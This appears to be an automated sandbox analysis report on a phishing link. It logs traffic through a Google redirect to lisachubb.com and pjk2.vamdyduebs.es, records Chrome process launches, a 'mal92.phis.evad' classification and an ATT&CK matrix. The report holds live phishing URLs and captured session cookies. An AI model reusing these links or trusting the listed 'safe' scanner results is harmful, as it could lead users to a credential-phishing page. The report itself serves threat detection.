              Source: global trafficHTTP traffic detected: GET /kT9ifrJ/ HTTP/1.1Host: pjk2.vamdyduebs.esConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://lisachubb.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /favicon.png HTTP/1.1Host: developers.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=9zrKhWFCVJ8JJVfRmZ2n5BrcL1bk_eKvltfCsvFny34-1743101949-1.0.1.1-pbqT0JhIDS7MzmTbfmsdK3QWavfKpeQGh5evx3Opfc6hQzn7rHOP87sS2RKHxEE.ZCB0X_2z3sVyWAH0FVGGWbs1cfVlJ8ymjC9lHbQbFgQ
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://pjk2.vamdyduebs.es/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=92711f95296d0c74&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/92711f95296d0c74/1743101951339/gG7XUl8rREJ52dX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/92711f95296d0c74/1743101951339/30af089456f68310af88812ffb4625e605cc57cdad4a126551e5cd66f2a8f2db/gsRwXFCPxzgMfCD HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/2nzl9/0x4AAAAAABA7k7nuYe99bzcm/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/596471834:1743093201:HfWe0GQspI-1r3OVdQ5KGaX9jP-ApZEFs_ADxL9ljvM/92711f95296d0c74/Tn4YPIhxUHt2rP15l6DeszPnEqjUkO3bhDlwJUrzwbU-1743101950-1.1.1.1-N4oWEouU682F07H_ItAmco_0uPGAOQuOU3dHZiX_O3NZZ.rFm35YWTFkjMacrI_X HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: lisachubb.com
              Source: global trafficDNS traffic detected: DNS query: pjk2.vamdyduebs.es
              Source: global trafficDNS traffic detected: DNS query: code.jquery.com
              Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: developers.cloudflare.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gcp.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons2.gvt2.com
              Source: global trafficDNS traffic detected: DNS query: beacons3.gvt2.com
              Source: unknownHTTP traffic detected: POST /recaptcha/api2/reload?k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 7754sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: application/x-protobuffersec-ch-ua-mobile: ?0Accept: */*Origin: https://www.google.comX-Client-Data: CLbgygE=Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWUAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: NID=522=ABwcjBVXedYZ4PZTTjpZV-5cOkqXYLAtfCaI8h7MrCwX5iStM0JFNJOPBuobNl6ltGvclraFjCIE-2KUH0nA-2kWU_7rla1wpsqjAk6SVHkn1k4mA1UNAXnVXVnmCvdl6WCkJOfz4Po_clFBlQ3Ap3tC83XYdiHWpXDWGzl7LzkF01AHIOEdnEJWnzJzQXsAyFuA9l-3nXWXk86jppRh
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 18:58:26 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.245.240.188:443 -> 192.168.2.16:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.245.240.188:443 -> 192.168.2.16:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.16:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.185.250:443 -> 192.168.2.16:49747 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.185.250:443 -> 192.168.2.16:49746 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.16:49748 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.17.25.14:443 -> 192.168.2.16:49750 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49749 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.6.189:443 -> 192.168.2.16:49752 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.16.4.189:443 -> 192.168.2.16:49753 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49754 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.18.95.41:443 -> 192.168.2.16:49757 version: TLS 1.2
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir6960_1680330996
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir6960_1680330996
              Source: classification engineClassification label: mal92.phis.evad.win@27/23@54/161
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,15964423701433874769,16393612139017731578,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2104,i,15964423701433874769,16393612139017731578,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2176 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 2.19.d.script.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              File Deletion
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h#?AynbDClvCqs9djvzki8kdrm19expwx==j8If1EgPfB7jihNIp005uIzL8bVQdPW2iYEqZ~JQ~1pwu5ro8b7dregga8ni8pcjy70e8jw2c#~JQ~LnJusWbClYIbJ4IuevwUc1s1rzg==CHHbFZTEMTyV0CrlRZJA4WrAlGr0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://lisachubb.com/favicon.ico0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/bframe?hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU0%Avira URL Cloudsafe
              https://www.google.com/url?q=https%3A%2F%2Flisachubb.com%2Fjsuhsks%2F&sa=D&sntz=1&usg=AOvVaw0F2q7kVD-KIPGQS9mKbD8h0%Avira URL Cloudsafe
              https://lisachubb.com/jsuhsks/0%Avira URL Cloudsafe
              https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdGwwArAAAAAAaqYl9mYv-BnJcbI4AoSUSzHzWU&co=aHR0cHM6Ly9saXNhY2h1YmIuY29tOjQ0Mw..&hl=en&v=hbAq-YhJxOnlU-7cpgBoAJHb&size=normal&cb=1vy2jk5iocqm0%Avira URL Cloudsafe
